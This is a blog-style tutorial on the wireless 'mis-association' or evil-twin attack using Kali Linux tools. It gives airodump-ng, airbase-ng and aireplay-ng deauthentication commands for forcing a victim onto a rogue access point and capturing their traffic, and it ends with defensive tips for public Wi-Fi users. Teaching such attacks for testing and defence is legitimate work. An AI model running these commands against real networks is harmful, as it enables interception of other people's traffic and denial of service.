Sunday 15 January 2017

Mis-Association attack on wireless Networks and how it works


Reference: Ethical Hacking and Penetration with Kali Linux

Reference: Kali Linux: Hacking Tools Introduction



The technique of mis-association attack is to get a computer connect to your Kali machine using one of the old Wirelesses that it has connected before. Or use the same SSID name as is available and has some clients. For example, if a computer was connected to a WIFI network called “Public-wifi” in the past, that name will be discovered and used to attack to the host.
The steps are as below:
  • Find one of the wireless SSID names that the victim has connected before using “airodump-ng”
  • Set up a new access point with exactly the same name
  • Send a de-auth message to the victim to it will be disconnected from the current AP and try to connect again
  • As the SSID you created is already on the victim’s list, it will be connected to your created AP.
  • You can start capture victim’s traffic!

To achieve this, below commands and steps need to be followed on Kali Linux:
  • airmon-ng start wlan0
  • airodump-ng mon0
    • You can see the station is trying to connect to a list of Aps that it has connected before (probe column) - e.g Public-wifi
    • Note: make sure that SSID is not available on the current list of APs
  • airbase-ng -essid “Public-wifi” -c 1 mon0
    • This will make Kali an access point and client can authenticate and connect
  • Set up DHCP and other setting as per previous section (Rogue access points)
  • Now the client station will try to connect to your computer as it has the same SSID on its database
  • If client machine is already connected to another WIFI, start a de-auth attach as below
  • aireplay-ng -0 0 -a 22:AF:3A:5E:22:3D mon0
    • This forces clients to reauthenticate and connect to our machine
  • Monitor the output of airbase-ng command to see when the victim connects

Security Tips:

  • Do NOT Connect to any public wireless network unless you are 100% certain.
  • If you are on public network, Do NOT use any sensitive information over clear text (http, ftp, etc)
  • If you are on public network, watch for certificate error messages
  • Try using a VPN if you need to use public networks

Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)